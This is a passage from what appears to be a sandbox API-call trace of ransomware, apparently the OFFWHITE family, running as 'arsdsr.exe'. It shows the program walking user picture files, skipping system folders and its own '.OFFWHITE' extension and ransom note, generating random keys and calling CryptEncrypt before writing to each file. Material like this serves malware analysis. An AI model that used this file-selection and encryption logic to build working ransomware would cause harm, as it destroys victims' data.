(lpString1="usertile23.bmp", lpString2="$recycle.bin") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="rsa") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="ntuser.dat") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="programdata") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="appdata") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="program files") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="program files (x86)") returned 1 [0146.728] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.728] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile23.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" [0146.728] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.728] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0146.728] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.728] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.729] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.729] lstrcmpiW (lpString1="usertile23.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.729] GetProcessHeap () returned 0x500000 [0146.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547078 [0146.729] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.729] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.729] GetProcessHeap () returned 0x500000 [0146.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546d58 [0146.729] GetProcessHeap () returned 0x500000 [0146.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526658 [0146.729] GetProcessHeap () returned 0x500000 [0146.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5622b0 [0146.729] GetProcessHeap () returned 0x500000 [0146.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5623b8 [0146.730] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.730] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.730] SystemFunction036 (in: RandomBuffer=0x546d58, RandomBufferLength=0x10 | out: RandomBuffer=0x546d58) returned 1 [0146.730] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.730] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.730] SystemFunction036 (in: RandomBuffer=0x526658, RandomBufferLength=0x10 | out: RandomBuffer=0x526658) returned 1 [0146.730] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.730] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.730] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5622b0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5622b0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.730] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.730] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.730] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5623b8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5623b8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.730] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.730] SetLastError (dwErrCode=0x0) [0146.730] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5622b0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.730] GetLastError () returned 0x6 [0146.730] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd232fa7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0146.730] lstrcmpiW (lpString1="usertile24.bmp", lpString2=".") returned 1 [0146.730] lstrcmpiW (lpString1="usertile24.bmp", lpString2="..") returned 1 [0146.730] lstrcmpiW (lpString1="usertile24.bmp", lpString2="...") returned 1 [0146.730] lstrcmpiW (lpString1="usertile24.bmp", lpString2="windows") returned -1 [0146.731] lstrcmpiW (lpString1="usertile24.bmp", lpString2="$recycle.bin") returned 1 [0146.731] lstrcmpiW (lpString1="usertile24.bmp", lpString2="rsa") returned 1 [0146.731] lstrcmpiW (lpString1="usertile24.bmp", lpString2="ntuser.dat") returned 1 [0146.731] lstrcmpiW (lpString1="usertile24.bmp", lpString2="programdata") returned 1 [0146.731] lstrcmpiW (lpString1="usertile24.bmp", lpString2="appdata") returned 1 [0146.731] lstrcmpiW (lpString1="usertile24.bmp", lpString2="program files") returned 1 [0146.731] lstrcmpiW (lpString1="usertile24.bmp", lpString2="program files (x86)") returned 1 [0146.731] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.731] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile24.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" [0146.731] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.731] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.731] PathFindExtensionW (pszPath="usertile24.bmp") returned=".bmp" [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.731] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.731] lstrcmpiW (lpString1="usertile24.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.731] GetProcessHeap () returned 0x500000 [0146.731] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547088 [0146.731] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.732] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.732] GetProcessHeap () returned 0x500000 [0146.732] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526670 [0146.732] GetProcessHeap () returned 0x500000 [0146.732] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526688 [0146.732] GetProcessHeap () returned 0x500000 [0146.732] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5624c0 [0146.732] GetProcessHeap () returned 0x500000 [0146.732] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5625c8 [0146.732] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.732] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.732] SystemFunction036 (in: RandomBuffer=0x526670, RandomBufferLength=0x10 | out: RandomBuffer=0x526670) returned 1 [0146.732] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.732] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.732] SystemFunction036 (in: RandomBuffer=0x526688, RandomBufferLength=0x10 | out: RandomBuffer=0x526688) returned 1 [0146.732] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.732] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.732] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5624c0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5624c0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.732] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.732] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.732] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5625c8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5625c8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.733] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.733] SetLastError (dwErrCode=0x0) [0146.733] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5624c0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.733] GetLastError () returned 0x6 [0146.733] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd259105, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2=".") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="..") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="...") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="windows") returned -1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="$recycle.bin") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="rsa") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="ntuser.dat") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="programdata") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="appdata") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="program files") returned 1 [0146.733] lstrcmpiW (lpString1="usertile25.bmp", lpString2="program files (x86)") returned 1 [0146.733] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.733] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile25.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" [0146.733] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.733] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.733] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0146.733] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.733] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.733] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.733] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.733] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.733] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.733] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.733] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.734] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.734] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.734] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.734] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.734] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.734] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.734] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.734] lstrcmpiW (lpString1="usertile25.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.734] GetProcessHeap () returned 0x500000 [0146.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547098 [0146.734] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.734] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.734] GetProcessHeap () returned 0x500000 [0146.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5266a0 [0146.734] GetProcessHeap () returned 0x500000 [0146.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5266b8 [0146.734] GetProcessHeap () returned 0x500000 [0146.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5627e0 [0146.734] GetProcessHeap () returned 0x500000 [0146.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5628e8 [0146.734] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.734] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.734] SystemFunction036 (in: RandomBuffer=0x5266a0, RandomBufferLength=0x10 | out: RandomBuffer=0x5266a0) returned 1 [0146.734] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.734] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.735] SystemFunction036 (in: RandomBuffer=0x5266b8, RandomBufferLength=0x10 | out: RandomBuffer=0x5266b8) returned 1 [0146.735] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.735] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.735] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5627e0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5627e0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.735] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.735] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.735] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5628e8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5628e8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.735] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.735] SetLastError (dwErrCode=0x0) [0146.735] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5627e0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.735] GetLastError () returned 0x6 [0146.735] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd27f263, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2=".") returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="..") returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="...") returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="windows") returned -1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="$recycle.bin") returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="rsa") returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="ntuser.dat") returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="programdata") returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="appdata") returned 1 [0146.735] lstrcmpiW (lpString1="usertile26.bmp", lpString2="program files") returned 1 [0146.736] lstrcmpiW (lpString1="usertile26.bmp", lpString2="program files (x86)") returned 1 [0146.736] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.736] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile26.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" [0146.736] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.736] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.736] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.736] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.736] lstrcmpiW (lpString1="usertile26.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.736] GetProcessHeap () returned 0x500000 [0146.736] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5470a8 [0146.736] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.749] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.749] GetProcessHeap () returned 0x500000 [0146.749] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5266d0 [0146.749] GetProcessHeap () returned 0x500000 [0146.749] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5266e8 [0146.749] GetProcessHeap () returned 0x500000 [0146.749] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5629f0 [0146.749] GetProcessHeap () returned 0x500000 [0146.749] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x562af8 [0146.749] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.749] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.749] SystemFunction036 (in: RandomBuffer=0x5266d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5266d0) returned 1 [0146.750] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.750] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.750] SystemFunction036 (in: RandomBuffer=0x5266e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5266e8) returned 1 [0146.750] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.750] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.750] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5629f0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5629f0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.750] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.750] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.750] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x562af8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x562af8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.750] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.750] SetLastError (dwErrCode=0x0) [0146.750] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5629f0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.750] GetLastError () returned 0x6 [0146.750] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4184d0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4184d0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd2a53c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0146.750] lstrcmpiW (lpString1="usertile27.bmp", lpString2=".") returned 1 [0146.750] lstrcmpiW (lpString1="usertile27.bmp", lpString2="..") returned 1 [0146.750] lstrcmpiW (lpString1="usertile27.bmp", lpString2="...") returned 1 [0146.750] lstrcmpiW (lpString1="usertile27.bmp", lpString2="windows") returned -1 [0146.750] lstrcmpiW (lpString1="usertile27.bmp", lpString2="$recycle.bin") returned 1 [0146.750] lstrcmpiW (lpString1="usertile27.bmp", lpString2="rsa") returned 1 [0146.750] lstrcmpiW (lpString1="usertile27.bmp", lpString2="ntuser.dat") returned 1 [0146.751] lstrcmpiW (lpString1="usertile27.bmp", lpString2="programdata") returned 1 [0146.751] lstrcmpiW (lpString1="usertile27.bmp", lpString2="appdata") returned 1 [0146.751] lstrcmpiW (lpString1="usertile27.bmp", lpString2="program files") returned 1 [0146.751] lstrcmpiW (lpString1="usertile27.bmp", lpString2="program files (x86)") returned 1 [0146.751] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.751] lstrcatW (in: 